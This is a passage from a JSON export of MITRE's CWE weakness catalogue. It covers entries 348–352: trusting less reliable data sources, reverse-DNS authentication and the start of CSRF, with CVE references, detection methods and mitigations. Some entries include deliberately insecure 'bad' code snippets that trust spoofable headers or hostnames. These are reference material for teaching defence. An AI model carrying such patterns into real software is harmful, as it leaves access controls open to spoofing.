Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Related_Attack_Patterns"}],"Previous_Entry_Name":{"#text":"Improperly Verified Signature","attr":{"@_Date":"2009-05-27"}}}},"348":{"attr":{"@_ID":"348","@_Name":"Use of Less Trusted Source","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software has two different sources of the same data or information, but it uses the source that has less support for verification, is less trusted, or is less resistant to attack.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"345","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":["Bypass Protection Mechanism","Gain Privileges or Assume Identity"],"Note":"An attacker could utilize the untrusted data source to bypass protection mechanisms and gain access to sensitive data."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"This code attempts to limit the access of a page to certain IP Addresses. It checks the \'HTTP_X_FORWARDED_FOR\' header in case an authorized user is sending the request through a proxy.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"PHP"},"xhtml:div":{"#text":"$requestingIP = \'0.0.0.0\';if (array_key_exists(\'HTTP_X_FORWARDED_FOR\', $_SERVER)) {else{}if(in_array($requestingIP,$ipAllowlist)){}else{}","xhtml:br":["","","","",""],"xhtml:div":[{"#text":"$requestingIP = $_SERVER[\'HTTP_X_FORWARDED_FOR\'];","attr":{"@_style":"margin-left:10px;"}},{"#text":"$requestingIP = $_SERVER[\'REMOTE_ADDR\'];","attr":{"@_style":"margin-left:10px;"}},{"#text":"generatePage();return;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},{"#text":"echo \\"You are not authorized to view this page\\";return;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}]}},{"attr":{"@_Nature":"good","@_Language":"PHP"},"xhtml:div":{"#text":"$requestingIP = \'0.0.0.0\';if (array_key_exists(\'HTTP_X_FORWARDED_FOR\', $_SERVER)) {else{}","xhtml:br":["","","",""],"xhtml:div":[{"#text":"echo \\"This application cannot be accessed through a proxy.\\";return;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},{"#text":"$requestingIP = $_SERVER[\'REMOTE_ADDR\'];","attr":{"@_style":"margin-left:10px;"}}],"xhtml:i":"..."}}],"Body_Text":["The \'HTTP_X_FORWARDED_FOR\' header can be user controlled and so should never be trusted. An attacker can falsify the header to gain access to the page.","This fixed code only trusts the \'REMOTE_ADDR\' header and so avoids the issue:","Be aware that \'REMOTE_ADDR\' can still be spoofed. This may seem useless because the server will send the response to the fake address and not the attacker, but this may still be enough to conduct an attack. For example, if the generatePage() function in this code is resource intensive, an attacker could flood the server with fake requests using an authorized IP and consume significant resources. This could be a serious DoS attack even though the attacker would never see the page\'s sensitive content."]}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2001-0860","Description":"Product uses IP address provided by a client, instead of obtaining it from the packet headers, allowing easier spoofing.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0860"},{"Reference":"CVE-2004-1950","Description":"Web product uses the IP address in the X-Forwarded-For HTTP header instead of a server variable that uses the connecting IP address, allowing filter bypass.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1950"},{"Reference":"BID:15326","Description":"Similar to CVE-2004-1950","Link":"http://www.securityfocus.com/bid/15326/info"},{"Reference":"CVE-2001-0908","Description":"Product logs IP address specified by the client instead of obtaining it from the packet headers, allowing information hiding.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0908"},{"Reference":"CVE-2006-1126","Description":"PHP application uses IP address from X-Forwarded-For HTTP header, instead of REMOTE_ADDR.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1126"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Use of Less Trusted Source"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"141"}},{"attr":{"@_CAPEC_ID":"142"}},{"attr":{"@_CAPEC_ID":"73"}},{"attr":{"@_CAPEC_ID":"76"}},{"attr":{"@_CAPEC_ID":"85"}}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, Observed_Examples, Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-07-17","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Demonstrative_Examples"}]}},"349":{"attr":{"@_ID":"349","@_Name":"Acceptance of Extraneous Untrusted Data With Trusted Data","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software, when processing trusted data, accepts any untrusted data that is also included with the trusted data, treating the untrusted data as if it were trusted.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"345","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"OMISSION: This weakness is caused by missing a security tactic during the architecture and design phase."},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":["Access Control","Integrity"],"Impact":["Bypass Protection Mechanism","Modify Application Data"],"Note":"An attacker could package untrusted data with trusted data to bypass protection mechanisms to gain access to and possibly modify sensitive data."}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2002-0018","Description":"Does not verify that trusted entity is authoritative for all entities in its response.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0018"},{"Reference":"CVE-2006-5462","Description":"use of extra data in a signature allows certificate signature forging","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5462"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Untrusted Data Appended with Trusted Data"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"ENV01-J","Entry_Name":"Place all security-sensitive code in a single JAR and sign and seal it"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"141"}},{"attr":{"@_CAPEC_ID":"142"}},{"attr":{"@_CAPEC_ID":"75"}}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, Related_Attack_Patterns, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Observed_Examples, Relationships"}],"Previous_Entry_Name":{"#text":"Untrusted Data Appended with Trusted Data","attr":{"@_Date":"2008-04-11"}}}},"350":{"attr":{"@_ID":"350","@_Name":"Reliance on Reverse DNS Resolution for a Security-Critical Action","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software performs reverse DNS resolution on an IP address to obtain the hostname and make a security decision, but it does not properly ensure that the IP address is truly associated with the hostname.","Extended_Description":{"xhtml:p":["Since DNS names can be easily spoofed or misreported, and it may be difficult for the software to detect if a trusted DNS server has been compromised, DNS names do not constitute a valid authentication mechanism.","When the software performs a reverse DNS resolution for an IP address, if an attacker controls the server for that IP address, then the attacker can cause the server to return an arbitrary hostname. As a result, the attacker may be able to bypass authentication, cause the wrong hostname to be recorded in log files to hide activities, or perform other attacks.","Attackers can spoof DNS names by either (1) compromising a DNS server and modifying its records (sometimes called DNS cache poisoning), or (2) having legitimate control over a DNS server associated with their IP address."]},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"290","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"923","@_View_ID":"1000"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"807","@_View_ID":"1000"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"923","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Architecture and Design"}},"Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":["Gain Privileges or Assume Identity","Bypass Protection Mechanism"],"Note":"Malicious users can fake authentication information by providing false DNS information."}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Use other means of identity verification that cannot be simply spoofed. Possibilities include a username/password or certificate."},{"attr":{"@_Mitigation_ID":"MIT-42"},"Phase":"Implementation","Description":"Perform proper forward and reverse DNS lookups to detect DNS spoofing."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"attr":{"@_Demonstrative_Example_ID":"DX-93"},"Intro_Text":"The following code samples use a DNS lookup in order to decide whether or not an inbound request is from a trusted host. If an attacker can poison the DNS cache, they can gain trusted status.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"struct hostent *hp;struct in_addr myaddr;char* tHost = \\"trustme.example.com\\";myaddr.s_addr=inet_addr(ip_addr_string);hp = gethostbyaddr((char *) &myaddr, sizeof(struct in_addr), AF_INET);if (hp && !strncmp(hp->h_name, tHost, sizeof(tHost))) {} else {}","xhtml:br":["","","","",""],"xhtml:div":[{"#text":"trusted = true;","attr":{"@_style":"margin-left:10px;"}},{"#text":"trusted = false;","attr":{"@_style":"margin-left:10px;"}}]}},{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"String ip = request.getRemoteAddr();InetAddress addr = InetAddress.getByName(ip);if (addr.getCanonicalHostName().endsWith(\\"trustme.com\\")) {}","xhtml:br":["",""],"xhtml:div":{"#text":"trusted = true;","attr":{"@_style":"margin-left:10px;"}}}},{"attr":{"@_Nature":"bad","@_Language":"C#"},"xhtml:div":{"#text":"IPAddress hostIPAddress = IPAddress.Parse(RemoteIpAddress);IPHostEntry hostInfo = Dns.GetHostByAddress(hostIPAddress);if (hostInfo.HostName.EndsWith(\\"trustme.com\\")) {}","xhtml:br":["",""],"xhtml:div":{"#text":"trusted = true;","attr":{"@_style":"margin-left:10px;"}}}}],"Body_Text":"IP addresses are more reliable than DNS names, but they can also be spoofed. Attackers can easily forge the source IP address of the packets they send, but response packets will return to the forged IP address. To see the response packets, the attacker has to sniff the traffic between the victim machine and the forged IP address. In order to accomplish the required sniffing, attackers typically attempt to locate themselves on the same subnet as the victim machine. Attackers may be able to circumvent this requirement by using source routing, but source routing is disabled across much of the Internet today. In summary, IP address verification can be a useful part of an authentication scheme, but it should not be the single factor required for authentication."},{"Intro_Text":"In these examples, a connection is established if a request is made by a trusted host.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"sd = socket(AF_INET, SOCK_DGRAM, 0);serv.sin_family = AF_INET;serv.sin_addr.s_addr = htonl(INADDR_ANY);servr.sin_port = htons(1008);bind(sd, (struct sockaddr *) & serv, sizeof(serv));while (1) {}","xhtml:br":["","","","",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"memset(msg, 0x0, MAX_MSG);clilen = sizeof(cli);h=gethostbyname(inet_ntoa(cliAddr.sin_addr));if (h->h_name==...) n = recvfrom(sd, msg, MAX_MSG, 0, (struct sockaddr *) & cli, &clilen);","xhtml:br":["","","",""]}}}},{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"while(true) {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"DatagramPacket rp=new DatagramPacket(rData,rData.length);outSock.receive(rp);String in = new String(p.getData(),0, rp.getLength());InetAddress IPAddress = rp.getAddress();int port = rp.getPort();if ((rp.getHostName()==...) & (in==...)) {}","xhtml:br":["","","","",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"out = secret.getBytes();DatagramPacket sp =new DatagramPacket(out,out.length, IPAddress, port);outSock.send(sp);","xhtml:br":["","",""]}}}}}}],"Body_Text":"These examples check if a request is from a trusted host before responding to a request, but the code only verifies the hostname as stored in the request packet. An attacker can spoof the hostname, thus impersonating a trusted client."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2001-1488","Description":"Does not do double-reverse lookup to prevent DNS spoofing.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1488"},{"Reference":"CVE-2001-1500","Description":"Does not verify reverse-resolved hostnames in DNS.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1500"},{"Reference":"CVE-2000-1221","Description":"Authentication bypass using spoofed reverse-resolved DNS hostnames.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-1221"},{"Reference":"CVE-2002-0804","Description":"Authentication bypass using spoofed reverse-resolved DNS hostnames.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0804"},{"Reference":"CVE-2001-1155","Description":"Filter does not properly check the result of a reverse DNS lookup, which could allow remote attackers to bypass intended access restrictions via DNS spoofing.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1155"},{"Reference":"CVE-2004-0892","Description":"Reverse DNS lookup used to spoof trusted content in intermediary.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0892"},{"Reference":"CVE-2003-0981","Description":"Product records the reverse DNS name of a visitor in the logs, allowing spoofing and resultant XSS.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0981"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Improperly Trusted Reverse DNS"},{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Trusting self-reported DNS name"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP29","Entry_Name":"Faulty endpoint authentication"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"142"}},{"attr":{"@_CAPEC_ID":"275"}},{"attr":{"@_CAPEC_ID":"73"}},{"attr":{"@_CAPEC_ID":"89"}}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-18"}},{"attr":{"@_External_Reference_ID":"REF-44","@_Section":""Sin 15: Not Updating Easily." Page 231"}},{"attr":{"@_External_Reference_ID":"REF-44","@_Section":""Sin 24: Trusting Network Name Resolution." Page 361"}},{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 16, "DNS Spoofing", Page 1002"}}]},"Notes":{"Note":{"#text":"CWE-350, CWE-247, and CWE-292 were merged into CWE-350 in CWE 2.5. CWE-247 was originally derived from Seven Pernicious Kingdoms, CWE-350 from PLOVER, and CWE-292 from CLASP. All taxonomies focused closely on the use of reverse DNS for authentication of incoming requests.","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Sean Eidemiller","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"added/updated demonstrative examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-06-23","Modification_Importance":"Critical","Modification_Comment":"CWE-247 and CWE-292 deprecated and merged into CWE-350 to address duplicates."},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-07-17","Modification_Comment":"updated Applicable_Platforms, Common_Consequences, Demonstrative_Examples, Description, Maintenance_Notes, Name, Potential_Mitigations, References, Relationships, Taxonomy_Mappings, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-02-18","Modification_Comment":"updated Description, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Demonstrative_Examples, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Demonstrative_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Demonstrative_Examples"}],"Previous_Entry_Name":{"#text":"Improperly Trusted Reverse DNS","attr":{"@_Date":"2013-07-17"}}}},"351":{"attr":{"@_ID":"351","@_Name":"Insufficient Type Distinction","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software does not properly distinguish between different types of elements in a way that leads to insecure behavior.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"345","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"436","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Other"}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2005-2260","Description":"Browser user interface does not distinguish between user-initiated and synthetic events.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2260"},{"Reference":"CVE-2005-2801","Description":"Product does not compare all required data in two separate elements, causing it to think they are the same, leading to loss of ACLs. Similar to Same Name error.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2801"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Insufficient Type Distinction"}},"Notes":{"Note":{"#text":"Overlaps others, e.g. Multiple Interpretation Errors.","attr":{"@_Type":"Relationship"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Relationship_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}]}},"352":{"attr":{"@_ID":"352","@_Name":"Cross-Site Request Forgery (CSRF)","@_Abstraction":"Compound","@_Structure":"Composite","@_Status":"Stable"},"Description":"The web application does not, or can not, sufficiently verify whether a well-formed, valid, consistent request was intentionally provided by the user who submitted the request.","Extended_Description":"When a web server is designed to receive a request from a client without any mechanism for verifying that it was intentionally sent, then it might be possible for an attacker to trick a client into making an unintentional request to the web server which will be treated as an authentic request. This can be done via a URL, image load, XMLHttpRequest, etc. and can result in exposure of data or unintended code execution.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"345","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"345","@_View_ID":"1003","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"Requires","@_CWE_ID":"346","@_View_ID":"1000"}},{"attr":{"@_Nature":"Requires","@_CWE_ID":"441","@_View_ID":"1000"}},{"attr":{"@_Nature":"Requires","@_CWE_ID":"642","@_View_ID":"1000"}},{"attr":{"@_Nature":"Requires","@_CWE_ID":"613","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Name":"Web Server","@_Prevalence":"Undetermined"}}},"Alternate_Terms":{"Alternate_Term":[{"Term":"Session Riding"},{"Term":"Cross Site Reference Forgery"},{"Term":"XSRF"}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Architecture and Design","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}},"Likelihood_Of_Exploit":"Medium","Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Availability","Non-Repudiation","Access Control"],"Impact":["Gain Privileges or Assume Identity","Bypass Protection Mechanism","Read Application Data","Modify Application Data","DoS: Crash, Exit, or Restart"],"Note":"The consequences will vary depending on the nature of the functionality that is vulnerable to CSRF. An attacker could effectively perform any operations as the victim. If the victim is an administrator or privileged user, the consequences may include obtaining complete control over the web application - deleting or stealing data, uninstalling the product, or using it to launch other attacks against all of the product\'s users. Because the attacker has the identity of the victim, the scope of CSRF is limited only by the victim\'s privileges."}},"Detection_Methods":{"Detection_Method":[{"attr":{"@_Detection_Method_ID":"DM-7"},"Method":"Manual Analysis","Description":{"xhtml:p":["This weakness can be detected using tools and techniques that require manual (human) analysis, such as penetration testing, threat modeling, and interactive tools that allow the tester to record and modify an active session.","Specifically, manual analysis can be useful for finding this weakness, and for minimizing false positives assuming an understanding of business logic. However, it might not achieve desired code coverage within limited time constraints. For black-box analysis, if credentials are not known for privileged accounts, then the most security-critical portions of the application may not receive sufficient attention.","Consider using OWASP CSRFTester to identify potential issues and aid in manual analysis."]},"Effectiveness":"High","Effectiveness_Notes":"These may be more effective than strictly automated techniques. This is especially the case with weaknesses that are related to design and business rules."},{"Method":"Automated Static Analysis","Description":"CSRF is currently difficult to detect reliably using automated techniques. This is because each application has its own implicit security policy that dictates which requests can be influenced by an outsider and automatically performed on behalf of a user, versus which requests require strong confidence that the user intends to make the request. For example, a keyword search of the public portion of a web site is typically expected to be encoded within a link that can be launched automatically when the user clicks on the link.","Effectiveness":"Limited"},{"Method":"Automated Static Analysis - Binary or Bytecode","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Bytecode Weakness Analysis - including disassembler + source code weakness analysis","Binary Weakness Analysis - including disassembler + source code weakness analysis"]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Manual Static Analysis - Binary or Bytecode","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Binary / Bytecode disassembler - then use manual analysis for vulnerabilities & anomalies"}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Dynamic Analysis with Automated Results Interpretation","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Web Application Scanner"}}]}},"Effectiveness":"High"},{"Method":"Dynamic Analysis with Manual Results Interpretation","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Fuzz Tester","Framework-based Fuzzer"]}}]}},"Effectiveness":"High"},{"Method":"Manual Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Focused Manual Spotcheck - Focused manual analysis of source","Manual Source Code Review (not inspections)"]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Automated Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Source code Weakness Analyzer","Context-configured Source Code Weakness Analyzer"]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Architecture or Design Review","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.)","Formal Methods / Correct-By-Construction"]}}]}},"Effectiveness":"SOAR Partial"}]},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-4"},"Phase":"Architecture and Design","Strategy":"Libraries or Frameworks","Description":{"xhtml:p":["Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.","For example, use anti-CSRF packages such as the OWASP CSRFGuard. [REF-330]","Another example is the ESAPI Session Management control, which includes a component for CSRF. [REF-45]"]}},{"Phase":"Implementation","Description":"Ensure that the application is free of cross-site scripting issues (CWE-79), because most CSRF defenses can be bypassed using attacker-controlled script."},{"Phase":"Architecture and Design","Description":"Generate a unique nonce for each form, place the nonce into the form, and verify the nonce upon receipt of the form. Be sure that the nonce is not predictable (CWE-330). [REF-332]","Effectiveness_Notes":"Note that this can be bypassed using XSS (CWE-79)."},{"Phase":"Architecture and Design","Description":"Identify especially dangerous operations. When the user performs a dangerous 